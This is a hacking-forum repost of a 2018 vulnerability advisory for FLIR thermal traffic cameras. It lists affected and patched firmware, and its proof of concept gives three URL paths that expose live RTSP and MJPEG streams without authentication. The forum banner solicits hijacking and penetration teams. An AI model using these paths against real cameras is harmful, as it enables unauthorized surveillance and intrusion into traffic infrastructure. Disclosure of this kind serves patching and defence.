跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-06
# Vendor: https://www.flir.com
# Link: https://www.flir.com/security/best-practices-for-cybersecurity/
# CVE: N/A
# Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)

# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                           E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                           V1.02.P01     (TI x-stream)  Codename: TIIP2
#                           V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                           V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                           V1.04         (ThermiCam)    Codename: ThermiCam
#                           V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                           V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                           V1.06         (VIP-IP)       Codename: VIP-IP
#                           V1.02.P02     (TrafiRadar)   Codename: TrafiRadar

# Vendor patched firmware version:
#
# Product name                Firmware      Released 
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------

# Description
# FLIR thermal traffic cameras suffer from an unauthenticated and unauthorized
# live RTSP video stream access.

# Advisory ID: ZSL-2018-5489
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php

# Simple PoC:

http://Target/live.mjpeg?id=1

rtsp://Target/mpeg4

http://Target/snapshot.jpg

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。